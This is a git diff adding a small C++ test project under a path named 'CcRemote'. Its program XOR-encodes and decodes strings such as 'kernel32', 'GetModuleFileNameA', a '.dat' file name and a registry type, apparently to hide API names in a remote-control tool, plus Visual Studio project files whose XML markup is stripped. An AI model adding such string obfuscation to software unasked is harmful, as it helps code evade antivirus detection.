+Debug|Win32|F:\myapp\CcRemote\strCodeTest\| diff --git a/strCodeTest/strCodeTest/strCodeTest.cpp b/strCodeTest/strCodeTest/strCodeTest.cpp new file mode 100644 index 0000000..344f54f --- /dev/null +++ b/strCodeTest/strCodeTest/strCodeTest.cpp @@ -0,0 +1,54 @@ +// stringCryDemo.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 +// + +#include + +char* crycode(char* str) +{ + printf("cry: %s \n", str); + int len = strlen(str); + char * a = (char *)operator new(len + 1); + a[0] = len; + printf("0x%02hhx,", a[0]); + for (size_t i = 1; i <= len; i++) + { + a[i] = str[i - 1] ^ (0xCC - i); + printf("0x%02hhx,", a[i]); + } + printf("\n"); + return a; +} + + +char* uncode(char* str) +{ + int len = str[0]; + char * uncodeStr = (char *)operator new(len + 1); + for (size_t i = 1; i <= len; i++) + { + uncodeStr[i - 1] = str[i] ^ (0xCC - i); + printf("%c", uncodeStr[i - 1]); + } + uncodeStr[len] = 0x00; + printf("\n"); + return uncodeStr; +} + + + + +int main() +{ + char a[] = "kernel32"; + char b[] = "GetModuleFileNameA"; + char c[] = "\\Cc28256.dat"; + char d[] = "REG_MULTI_SZ"; + char* s1 = crycode(a); + char* s2 = crycode(b); + char* s3 = crycode(c); + char* s4 = crycode(d); + uncode(s1); + uncode(s2); + uncode(s3); + uncode(s4); +} \ No newline at end of file diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj b/strCodeTest/strCodeTest/strCodeTest.vcxproj new file mode 100644 index 0000000..f502898 --- /dev/null +++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj @@ -0,0 +1,159 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 15.0 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C} + Win32Proj + strCodeTest + 10.0.17763.0 + + + + Application + true + v141 + Unicode + + + Application + false + v141 + true + Unicode + + + Application + true + v141 + Unicode + + + Application + false + v141 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + Disabled + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + Disabled + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + MaxSpeed + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + Level3 + MaxSpeed + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters b/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters new file mode 100644 index 0000000..ccf0b43 --- /dev/null +++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + 源文件 + + + \ No newline at end of file diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj.user b/strCodeTest/strCodeTest/strCodeTest.vcxproj.user new file mode 100644 index 0000000..be25078 --- /dev/null +++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file